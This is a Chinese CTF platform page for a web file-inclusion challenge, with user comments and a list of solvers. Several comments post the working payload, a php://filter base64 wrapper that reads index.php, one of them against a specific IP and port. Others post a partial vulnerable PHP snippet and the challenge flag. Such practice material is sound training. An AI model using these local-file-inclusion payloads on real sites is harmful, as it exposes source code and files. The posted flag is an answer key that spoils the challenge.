文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 10241
提  示:
描  述:
flag{}
评论
CHLing 2天前

file=php://filter/convert.base64-encode/resource=index.php

回复 0

Tolayxu 1月前

跟南邮ctf一摸一样

回复 0

17344057285 1月前

flag{b8aba5bfc55997b3368ac7b88fe3854f}

回复 0

YUMEKO 3月前

http://xxxxxxxxxxxxx/index.php?file=///flag

回复 1

15614005380 3月前

php伪协议的简单利用

回复 0

zh2i 6月前

回复 0
YUMEKO 3月前

过分了,谁都知道是伪协议

回复 0

EtHat 6月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

bkyhack123 7月前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

bkyhack123 7月前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

fonddream 8月前

http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg

回复 1

WriteUp

image
harry

2 金币

评分(10)

解题动态

17794615149 攻破了该题 6小时前
GStj 攻破了该题 1天前
refrain001 攻破了该题 1天前
aaLi 攻破了该题 2天前
yangbing8555 攻破了该题 2天前
onjn14 攻破了该题 2天前
maomaoht 攻破了该题 2天前
许愿芙芙 攻破了该题 2天前
曹懆 攻破了该题 2天前
CHLing 攻破了该题 2天前
史蒂夫1 攻破了该题 2天前
xxj200491 攻破了该题 2天前
fhyyzj 攻破了该题 2天前
wangxiaodongpromax 攻破了该题 2天前
常世万法仙君 攻破了该题 2天前
毛毛不会ctf 攻破了该题 2天前
NUJYayju 攻破了该题 2天前
zhengjialu 攻破了该题 3天前
15984685470 攻破了该题 3天前
180277049 攻破了该题 3天前